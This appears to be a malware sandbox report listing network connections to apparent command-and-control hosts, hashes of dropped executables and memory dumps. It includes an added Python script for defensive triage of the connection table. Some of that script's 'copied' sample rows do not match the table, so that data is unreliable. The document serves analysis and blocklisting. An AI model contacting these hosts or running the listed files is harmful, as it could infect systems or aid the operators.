| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| MX | 187.235.157.13:40500 | udp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 13.157.235.187.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 217.171.148.45:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| IR | 2.179.60.101:40500 | udp | |
| US | 8.8.8.8:53 | 101.60.179.2.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 78.37.229.249:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 249.229.37.78.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| KZ | 89.218.186.86:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 86.186.218.89.in-addr.arpa | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| KZ | 95.59.165.102:40500 | udp | |
| US | 8.8.8.8:53 | 102.165.59.95.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| KZ | 92.46.228.246:40500 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 178.206.158.183:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 8.8.8.8:53 | 183.158.206.178.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| TJ | 109.74.69.43:40500 | udp | |
| US | 26.185.184.104:942 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 43.69.74.109.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| TR | 91.93.138.14:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 14.138.93.91.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| SY | 188.160.12.49:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| IR | 2.179.117.33:40500 | udp | |
| US | 8.8.8.8:53 | 33.117.179.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 26.185.184.104:942 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| KZ | 37.150.154.178:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 178.154.150.37.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.160.12:40500 | udp | |
| US | 8.8.8.8:53 | 12.160.156.90.in-addr.arpa | udp |
| UZ | 213.230.108.92:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| YE | 134.35.126.112:40500 | udp | |
| US | 8.8.8.8:53 | 112.126.35.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| IR | 37.254.96.229:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| SY | 82.137.244.65:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 229.96.254.37.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 26.185.184.104:942 | tcp | |
| DE | 193.161.193.99:25170 | tcp |
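The connection table above is raw sandbox output with several different behaviours mixed together: repeated TCP sessions to a handful of fixed endpoints, one UDP/TCP port (40500) contacted on many unrelated peers around the world, a reverse (PTR) lookup of each of those peers right after the connection, and loopback traffic. The script below is an added triage example for this page, not part of the report or of the sandbox's own tooling. It parses rows in the table's layout (rows with no resolved name have one cell fewer), separates loopback and DNS traffic from outbound connections, ranks repeated destinations as beacon candidates, reports ports that are contacted on many distinct peers, and maps each PTR query back to the peer it reverses. The embedded rows are a subset copied from the table above; the three-peer fan-out threshold is an assumption chosen for illustration, and port 9222 is flagged because it is the default Chromium remote-debugging port.

```python
"""Triage a sandbox network-connection table (added example, not sandbox tooling)."""
from collections import Counter, defaultdict
import ipaddress

# Constructed input: a subset of rows copied from the connection table above.
# Rows with a resolved name have four cells; rows without one have three,
# so the protocol then sits where the name column would be.
SAMPLE_ROWS = """\
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| MX | 189.191.143.93:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 8.8.8.8:53 | 93.143.191.189.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 2.176.92.74:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 74.92.176.2.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| SY | 82.137.218.134:40500 | udp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| MX | 189.167.44.219:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp |
"""

# Default Chromium/Chrome remote-debugging port: a loopback connection to it is
# what stealers that drive the browser over DevTools look like on the wire.
CHROME_DEVTOOLS_PORT = 9222

# Assumed threshold: a port contacted on at least this many distinct peers is
# reported as fan-out (peer-style traffic) rather than as a single C2 endpoint.
FANOUT_MIN_PEERS = 3


def parse_row(line):
    """Return (country, ip, port, domain, proto) for one table row, else None."""
    cells = [c.strip() for c in line.strip().split("|")]
    cells = [c for c in cells if c]
    if len(cells) not in (3, 4):
        return None
    country, endpoint = cells[0], cells[1]
    domain = cells[2] if len(cells) == 4 else ""
    proto = cells[-1].lower()
    ip, _, port = endpoint.rpartition(":")
    try:
        ipaddress.ip_address(ip)
        port = int(port)
    except ValueError:
        return None
    return country, ip, port, domain, proto


def ptr_to_ip(name):
    """Turn '93.143.191.189.in-addr.arpa' back into '189.191.143.93'."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    return ".".join(reversed(octets))


def triage(table_text):
    """Split rows into loopback, DNS and outbound traffic and rank the outbound set."""
    beacons = Counter()
    peers_by_port = defaultdict(set)
    loopback_ports = set()
    dns = {"ptr": [], "forward": []}
    for line in table_text.splitlines():
        row = parse_row(line)
        if row is None:
            continue
        _country, ip, port, domain, proto = row
        if ipaddress.ip_address(ip).is_loopback:
            loopback_ports.add(port)
            continue
        if port == 53 and proto == "udp":
            kind = "ptr" if domain.endswith(".in-addr.arpa") else "forward"
            dns[kind].append(domain)
            continue
        label = f"{ip}:{port}" + (f" ({domain})" if domain else "")
        beacons[label] += 1
        peers_by_port[port].add(ip)

    all_peers = set().union(*peers_by_port.values()) if peers_by_port else set()
    reversed_peers = {ptr_to_ip(n) for n in dns["ptr"]}
    return {
        "beacons": beacons.most_common(),
        "fanout_ports": {p: len(ips) for p, ips in peers_by_port.items()
                         if len(ips) >= FANOUT_MIN_PEERS},
        "loopback_ports": sorted(loopback_ports),
        "devtools_port_seen": CHROME_DEVTOOLS_PORT in loopback_ports,
        "dns": dns,
        # Peers the sample both connected to and then reverse-resolved.
        "ptr_matches_peer": sorted(ip for ip in reversed_peers if ip in all_peers),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_ROWS), indent=2))
```

Run against the full table, the same logic separates the fixed endpoints (185.218.125.157:21441, 193.161.193.99:25170, the zapto.org and ply.gg hosts) from the port-40500 peer fan-out and its PTR lookups, which is the distinction a blocklist derived from this report should preserve: the fixed endpoints are worth blocking outright, the 40500 peers are residential addresses that rotate.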
Files
memory/4504-4-0x00007FFCC5D73000-0x00007FFCC5D75000-memory.dmp
memory/4504-5-0x0000000000750000-0x0000000000758000-memory.dmp
memory/4504-6-0x00007FFCC5D70000-0x00007FFCC6831000-memory.dmp
memory/4288-7-0x0000000000AC0000-0x0000000000AC8000-memory.dmp
memory/4288-8-0x0000000005470000-0x000000000550C000-memory.dmp
C:\Users\Admin\Desktop\Files\surfex.exe
| MD5 | 1f4b0637137572a1fb34aaa033149506 |
| SHA1 | c209c9a60a752bc7980a3d9d53daf4b4b32973a9 |
| SHA256 | 60c645c0a668c13ad36d2d5b67777dedf992e392e652e7f0519f21d658254648 |
| SHA512 | 4fd27293437b8bf77d15d993da2b0e75c9fba93bd5f94dad439a3e2e4c16c444f6a32543271f1d2ad79c220354b23301e544765ca392fc156267a89338452e86 |
memory/2536-20-0x0000000000560000-0x00000000005B4000-memory.dmp
memory/1772-22-0x0000000000400000-0x0000000000450000-memory.dmp
memory/1772-24-0x0000000005800000-0x0000000005DA4000-memory.dmp
memory/1772-25-0x00000000052F0000-0x0000000005382000-memory.dmp
memory/1772-26-0x0000000005270000-0x000000000527A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tmp500F.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/1772-43-0x0000000005FB0000-0x0000000006026000-memory.dmp
memory/1772-44-0x0000000006750000-0x000000000676E000-memory.dmp
memory/1772-47-0x0000000006D90000-0x00000000073A8000-memory.dmp
memory/1772-48-0x00000000068E0000-0x00000000069EA000-memory.dmp
memory/1772-49-0x0000000006820000-0x0000000006832000-memory.dmp
memory/1772-50-0x0000000006880000-0x00000000068BC000-memory.dmp
memory/1772-51-0x00000000069F0000-0x0000000006A3C000-memory.dmp
memory/4504-52-0x00007FFCC5D73000-0x00007FFCC5D75000-memory.dmp
memory/4504-53-0x00007FFCC5D70000-0x00007FFCC6831000-memory.dmp
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\u1w30Wt.exe
| MD5 | e3eb0a1df437f3f97a64aca5952c8ea0 |
| SHA1 | 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a |
| SHA256 | 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521 |
| SHA512 | 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
| MD5 | 52a3c7712a84a0f17e9602828bf2e86d |
| SHA1 | 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2 |
| SHA256 | afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288 |
| SHA512 | 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac |
memory/4664-85-0x000001F7618D0000-0x000001F7618E8000-memory.dmp
memory/4664-86-0x000001F77BEF0000-0x000001F77C0B2000-memory.dmp
memory/4664-87-0x000001F77D170000-0x000001F77D698000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 3626532127e3066df98e34c3d56a1869 |
| SHA1 | 5fa7102f02615afde4efd4ed091744e842c63f78 |
| SHA256 | 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca |
| SHA512 | dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd |
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 045b0a3d5be6f10ddf19ae6d92dfdd70 |
| SHA1 | 0387715b6681d7097d372cd0005b664f76c933c7 |
| SHA256 | 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d |
| SHA512 | 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip
| MD5 | cea368fc334a9aec1ecff4b15612e5b0 |
| SHA1 | 493d23f72731bb570d904014ffdacbba2334ce26 |
| SHA256 | 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541 |
| SHA512 | bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | 0dc4014facf82aa027904c1be1d403c1 |
| SHA1 | 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831 |
| SHA256 | a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7 |
| SHA512 | cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | b7d1e04629bec112923446fda5391731 |
| SHA1 | 814055286f963ddaa5bf3019821cb8a565b56cb8 |
| SHA256 | 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789 |
| SHA512 | 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 7187cc2643affab4ca29d92251c96dee |
| SHA1 | ab0a4de90a14551834e12bb2c8c6b9ee517acaf4 |
| SHA256 | c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830 |
| SHA512 | 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
| MD5 | 5eb39ba3698c99891a6b6eb036cfb653 |
| SHA1 | d2f1cdd59669f006a2f1aa9214aeed48bc88c06e |
| SHA256 | e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2 |
| SHA512 | 6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
| MD5 | 5404286ec7853897b3ba00adf824d6c1 |
| SHA1 | 39e543e08b34311b82f6e909e1e67e2f4afec551 |
| SHA256 | ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266 |
| SHA512 | c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
| MD5 | 5659eba6a774f9d5322f249ad989114a |
| SHA1 | 4bfb12aa98a1dc2206baa0ac611877b815810e4c |
| SHA256 | e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4 |
| SHA512 | f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\in.exe
| MD5 | 83d75087c9bf6e4f07c36e550731ccde |
| SHA1 | d5ff596961cce5f03f842cfd8f27dde6f124e3ae |
| SHA256 | 46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f |
| SHA512 | 044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a |
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
| MD5 | 579a63bebccbacab8f14132f9fc31b89 |
| SHA1 | fca8a51077d352741a9c1ff8a493064ef5052f27 |
| SHA256 | 0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0 |
| SHA512 | 4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f |
memory/4304-150-0x00007FF634E60000-0x00007FF6352F0000-memory.dmp
memory/4304-152-0x00007FF634E60000-0x00007FF6352F0000-memory.dmp
memory/1696-156-0x000002B49F8B0000-0x000002B49F8D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43hnnz1t.2lu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\surfex.exe.log
| MD5 | 84cfdb4b995b1dbf543b26b86c863adc |
| SHA1 | d2f47764908bf30036cf8248b9ff5541e2711fa2 |
| SHA256 | d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b |
| SHA512 | 485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\76b53b3ec448f7ccdda2063b15d2bfc3_dd2803c7-d377-4f06-bdfe-aea230fc7b0e
| MD5 | 95a6a7c7899095edc189480a9904c0ce |
| SHA1 | dd86d52d306763b7c7bf719c063cedb586878f4d |
| SHA256 | 48d1496b5129adf774d3667902cd0e6b32b459d0b35a310137498d2589f85d89 |
| SHA512 | ba11187c25ff37527a4cbddc1f5af98ec97bca5321de11de844d17d25a65fd787c88c13d1c020b67718cd63a7f0d3e0264ff8badd1701e68938af5b0dc87d2d1 |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | a268d115ecab661ba67bdf6aaff9dc80 |
| SHA1 | a9a60e9b30c29872f3c31acf3c899e66dd02cb89 |
| SHA256 | 98a5373e33681b3f9a448f58fb8957217cbb8a35326dad8a3b0acfed734b2eb0 |
| SHA512 | ee3c11823960f76aa2fed1c414dcbb92e671f8acfe0574334e7dbae4f7e52eb3a2e500c5486d6f11865c284fef0ea735f161c1ca32c5c6605d606603f3ab283d |
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 4deec5071395c7fbdd39221afe5de2bb |
| SHA1 | 9b14d2e89f40b9b5c8bd959dfb2bceffaf4d53eb |
| SHA256 | 3873f56bbdb60e9dcf5446439419735c32c1586a75732e82e317a732d35d024d |
| SHA512 | 8e2f6531a28862500e2d38268f89f65b055c0caa6cdb602c53588d201c7a64c3f4910606dbabb7e56caa84fec1cdb38234af4f8912fae3f9bb02bcaa9db91c16 |
memory/1696-191-0x000002B49FBE0000-0x000002B49FD2E000-memory.dmp
memory/3796-240-0x00007FF712100000-0x00007FF712590000-memory.dmp
memory/3012-239-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3012-241-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3012-243-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3012-244-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3012-242-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3012-246-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3012-245-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3012-247-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3012-251-0x0000000140000000-0x0000000140770000-memory.dmp
memory/3796-252-0x00007FF712100000-0x00007FF712590000-memory.dmp
memory/3012-250-0x0000000002780000-0x00000000027A0000-memory.dmp
memory/3012-249-0x0000000140000000-0x0000000140770000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 227556da5e65f6819f477756808c17e4 |
| SHA1 | 6ffce766e881ca2a60180bb25f4981b183f78279 |
| SHA256 | 101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4 |
| SHA512 | d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
| MD5 | d68f79c459ee4ae03b76fa5ba151a41f |
| SHA1 | bfa641085d59d58993ba98ac9ee376f898ee5f7b |
| SHA256 | aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6 |
| SHA512 | bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e |
memory/3012-279-0x0000000140000000-0x0000000140770000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe
| MD5 | 63c4e3f9c7383d039ab4af449372c17f |
| SHA1 | f52ff760a098a006c41269ff73abb633b811f18e |
| SHA256 | 151524f6c1d1aeac530cfd69de15c3336043dc8eb3f5aeaa31513e24bfd7acdd |
| SHA512 | dcfb4804c5569ad13e752270d13320f8769601b7092544741e35bc62a22af363b7a5ea7c5a65132c9575540a3e689a6946110502bd0f046385b8739e81761fbf |
C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
